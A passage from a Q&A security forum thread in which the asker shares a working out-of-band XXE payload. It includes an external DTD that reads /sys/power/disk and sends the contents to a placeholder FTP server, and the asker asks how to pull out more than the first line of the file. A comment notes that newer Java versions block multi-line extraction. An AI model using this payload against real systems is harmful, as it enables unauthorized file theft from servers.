XXE OOB File Content Extraction

Asked2 years, 1 month ago

Viewed 419 times

Currently, I've discovered an OOB XXE that allows me to include a .dtd file to extract a particular system file content, for instance, /sys/power/disk.

So my file.dtd is:

<!ENTITY % data SYSTEM "file:///sys/power/disk"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://MY_SERVER/%data;'>">

And the web payload is:

<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://SERVER/file.dtd"> %sp; %param1; ]> <r>&exfil;</r>

I mounted the FTP server and all is working. The issue is that even when the payload works, the server returns only the first line of the indicated file. I thought maybe encoding the file content it can be included by the parser.

asked Mar 22, 2023 at 15:54

nicg

111 bronze badge

Maybe this is useful for you: stackoverflow.com/questions/58395997/… , looks like newer versions of java don't allow multiple lines.
– Christiaan
CommentedMar 23, 2023 at 9:58

Add a comment |

0 You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.

Stack Exchange Network

XXE OOB File Content Extraction

0

You must log in to answer this question.

Hot Network Questions

XXE OOB File Content Extraction

0

You must log in to answer this question.

Related

Hot Network Questions